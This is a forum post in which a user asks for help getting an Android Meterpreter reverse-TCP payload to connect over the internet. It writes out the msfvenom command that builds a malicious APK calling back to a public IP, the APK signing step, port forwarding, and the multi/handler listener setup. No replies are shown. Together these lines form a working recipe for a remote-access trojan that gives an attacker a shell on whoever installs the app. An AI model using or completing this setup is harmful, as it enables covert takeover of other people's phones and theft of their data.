Forum Thread: Msfvenom Payload Android Doesnt Connect

I want to make a payload for android that works over WAN

that what i do
Msfvenom –p android/meterpreter/reverse_tcp LHOST=181.114.103.5 (public ip) LPORT=2213 R > /root/Desktop/vm.apk
I signed the payload with SignApk jar
PORT FOWARDED the ip I found in my kali network settings: 192.168.10.129:2213
Msfconsole
Use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.10.129
set LPORT 2213
Exploit

Everything connect correctly

But then I install the app on my phone and run it but nothing happens, so which ip should i use for the payload:
handler:
port forward:

pleeease x

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active